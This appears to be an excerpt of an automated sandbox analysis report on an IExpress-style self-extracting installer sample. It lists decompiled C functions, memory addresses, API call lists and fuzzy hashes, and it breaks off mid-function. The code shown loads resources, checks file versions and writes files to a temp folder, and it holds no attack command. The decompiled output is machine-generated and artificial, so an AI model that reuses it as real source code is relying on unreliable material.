                                                                        0x00f864c2
                                                                        0x00f864d3
                                                                        0x00f864df
                                                                        0x00f864e8
                                                                        0x00f86502
                                                                        0x00f864ee
                                                                        0x00f864f9
                                                                        0x00f864f9
                                                                        0x00f86516

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F86502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                        • API String ID: 438848745-3290281839
                                                                        • Opcode ID: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                        • Instruction ID: 422cb36fd2efdf1091799ef5b672aea7aa096302c1fd9b6d11b27a741f173b45
                                                                        • Opcode Fuzzy Hash: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                        • Instruction Fuzzy Hash: 5E01D130A04108ABEB10FB64DC49AFE7778EB50310F50029AF585D61C0DFB4AE8AAB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00F82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}

































                                                                        0x00f828f1
                                                                        0x00f828f4
                                                                        0x00f828f7
                                                                        0x00f828f9
                                                                        0x00f828fc
                                                                        0x00f828ff
                                                                        0x00f82901
                                                                        0x00f82907
                                                                        0x00f82a62
                                                                        0x00f82a64
                                                                        0x00f8290d
                                                                        0x00f8290d
                                                                        0x00f8290f
                                                                        0x00f82912
                                                                        0x00f82920
                                                                        0x00f82937
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82944
                                                                        0x00f8294a
                                                                        0x00f8294f
                                                                        0x00f82a2f
                                                                        0x00f82a32
                                                                        0x00f82a34
                                                                        0x00f82a37
                                                                        0x00f82a41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82955
                                                                        0x00f8295e
                                                                        0x00f82962
                                                                        0x00f82969
                                                                        0x00f8296f
                                                                        0x00f82974
                                                                        0x00f8298c
                                                                        0x00f82a20
                                                                        0x00f82a21
                                                                        0x00f82a27
                                                                        0x00f82a4c
                                                                        0x00f82a4f
                                                                        0x00f82a50
                                                                        0x00f82a53
                                                                        0x00f82a56
                                                                        0x00f82a5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f829b2
                                                                        0x00f829b2
                                                                        0x00f829b5
                                                                        0x00f829bd
                                                                        0x00f829c3
                                                                        0x00f829cc
                                                                        0x00f829d5
                                                                        0x00f829d7
                                                                        0x00f829da
                                                                        0x00f829dd
                                                                        0x00f829df
                                                                        0x00f829ec
                                                                        0x00f829f8
                                                                        0x00f829fc
                                                                        0x00f829ff
                                                                        0x00f82a02
                                                                        0x00f82a07
                                                                        0x00f82a0a
                                                                        0x00f82a0f
                                                                        0x00f82a19
                                                                        0x00f82a81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82a0f
                                                                        0x00f8298c
                                                                        0x00f82974
                                                                        0x00f82962
                                                                        0x00000000
                                                                        0x00f8294f
                                                                        0x00f82912
                                                                        0x00f82a65
                                                                        0x00f82a68
                                                                        0x00f82a6c
                                                                        0x00f82a6f
                                                                        0x00f82a6f
                                                                        0x00f82a7d

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00F82A6F
                                                                          • Part of subcall function 00F82773: CharUpperA.USER32(7E92E7A6,00000000,00000000,00000000), ref: 00F827A8
                                                                          • Part of subcall function 00F82773: CharNextA.USER32(0000054D), ref: 00F827B5
                                                                          • Part of subcall function 00F82773: CharNextA.USER32(00000000), ref: 00F827BC
                                                                          • Part of subcall function 00F82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                          • Part of subcall function 00F82773: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                          • Part of subcall function 00F82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                          • Part of subcall function 00F82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005), ref: 00F82958
                                                                        • GlobalLock.KERNEL32 ref: 00F82969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005,?), ref: 00F82A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F82A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                        • Instruction ID: 7199bdf0d8b76b11d604cbb09567959cc1db4374a21e72e45db5e0f3d68654ca
                                                                        • Opcode Fuzzy Hash: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                        • Instruction Fuzzy Hash: 83511731E00219DBDB65EF98C884AEEFBB5FF48710F14416AE905E3211DB39A941EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00F84169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00F8468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00F8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00F844B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}





                                                                        0x00f8417d
                                                                        0x00f8418f
                                                                        0x00f84193
                                                                        0x00f841b7
                                                                        0x00f841d3
                                                                        0x00f841e6
                                                                        0x00000000
                                                                        0x00f841e7
                                                                        0x00f841d5
                                                                        0x00f841d6
                                                                        0x00f841d8
                                                                        0x00f841d9
                                                                        0x00f841da
                                                                        0x00f841df
                                                                        0x00f841e1
                                                                        0x00000000
                                                                        0x00f841e1
                                                                        0x00f841b9
                                                                        0x00f841ba
                                                                        0x00f841bc
                                                                        0x00f841bd
                                                                        0x00f841be
                                                                        0x00000000
                                                                        0x00f841be
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F84189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F841E7
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                        • Instruction ID: 7c3926e369d0412d9f3d01b02b4c6005726a317d1cbe4c0f99adba1cf497fadb
                                                                        • Opcode Fuzzy Hash: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                        • Instruction Fuzzy Hash: 5501F4B270061A7BF72576654C8AFFB718EEBD47A5F104126B705E1180DA6CEC017375
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00F843D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xf89a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}













                                                                        0x00f819e0
                                                                        0x00f819e0
                                                                        0x00f819eb
                                                                        0x00f819f2
                                                                        0x00f819f9
                                                                        0x00f819fc
                                                                        0x00f81a01
                                                                        0x00f81a2a
                                                                        0x00f81a2e
                                                                        0x00f81a3e
                                                                        0x00f81a4f
                                                                        0x00f81a62
                                                                        0x00f81a6a
                                                                        0x00000000
                                                                        0x00f81a03
                                                                        0x00f81a06
                                                                        0x00f81a20
                                                                        0x00f81a20
                                                                        0x00f81a08
                                                                        0x00f81a08
                                                                        0x00f81a14
                                                                        0x00000000
                                                                        0x00f81a16
                                                                        0x00f81a18
                                                                        0x00f81a70
                                                                        0x00f81a72
                                                                        0x00f81a72
                                                                        0x00f81a14
                                                                        0x00f81a06
                                                                        0x00f81a81

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F81A18
                                                                        • GetDesktopWindow.USER32 ref: 00F81A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00F81A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F81A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00F81A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                        • Instruction ID: 728c2fc31c5987c2fc8373e8d54faa30cb4d805b32f67f0ffb9b1a6be94f2d0a
                                                                        • Opcode Fuzzy Hash: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                        • Instruction Fuzzy Hash: DC11CE3150010DABDB04EF64DD48AFE77B8FB09310F108255F92292190DA349E02FB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F87155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xf88004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xf88004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xf88008 = _t37;
                                                                        				return _t37;
                                                                        			}











                                                                        0x00f8715d
                                                                        0x00f87161
                                                                        0x00f87165
                                                                        0x00f87178
                                                                        0x00f87182
                                                                        0x00f8718e
                                                                        0x00f87197
                                                                        0x00f871a0
                                                                        0x00f871b1
                                                                        0x00f871b8
                                                                        0x00f871c4
                                                                        0x00f871c7
                                                                        0x00f871cb
                                                                        0x00f871d5
                                                                        0x00f871da
                                                                        0x00f871da
                                                                        0x00f871dc
                                                                        0x00f871dc
                                                                        0x00f871e2
                                                                        0x00f871e5
                                                                        0x00f871ee

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                        • GetTickCount.KERNEL32 ref: 00F871A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                        • Instruction ID: 119c50f11e19e2f3e0b8d2d475fa5528bcfd264ee14c0bd485c31444b651d7d8
                                                                        • Opcode Fuzzy Hash: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                        • Instruction Fuzzy Hash: 23112871D0560C9BCF10EBB8DA48AEEBBF4EB08350FA14856D801E7214EA309A05AF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00F863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00F81781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				E00F8658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xf89124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xf89124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00F86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}















                                                                        0x00f863cb
                                                                        0x00f863d2
                                                                        0x00f863d8
                                                                        0x00f863ea
                                                                        0x00f863f3
                                                                        0x00f86401
                                                                        0x00f86402
                                                                        0x00f86410
                                                                        0x00f86415
                                                                        0x00f86433
                                                                        0x00f86438
                                                                        0x00f86449
                                                                        0x00f86463
                                                                        0x00f8646d
                                                                        0x00f86477
                                                                        0x00f86477
                                                                        0x00f8647a
                                                                        0x00f8643a
                                                                        0x00f8643a
                                                                        0x00f86444
                                                                        0x00f86444
                                                                        0x00f86492

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F863EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 1065093856-3217841213
                                                                        • Opcode ID: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                        • Instruction ID: 14746c62804371590d1fadec75ad96ce43b6c250d46e65103746dc1d49c9ecbb
                                                                        • Opcode Fuzzy Hash: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                        • Instruction Fuzzy Hash: 1921C071A0021CABDB10EF65DCC5FEF77A8EB45314F0041A9B585A7280DAB45D85AFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F847E0(intOrPtr* __ecx) {
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
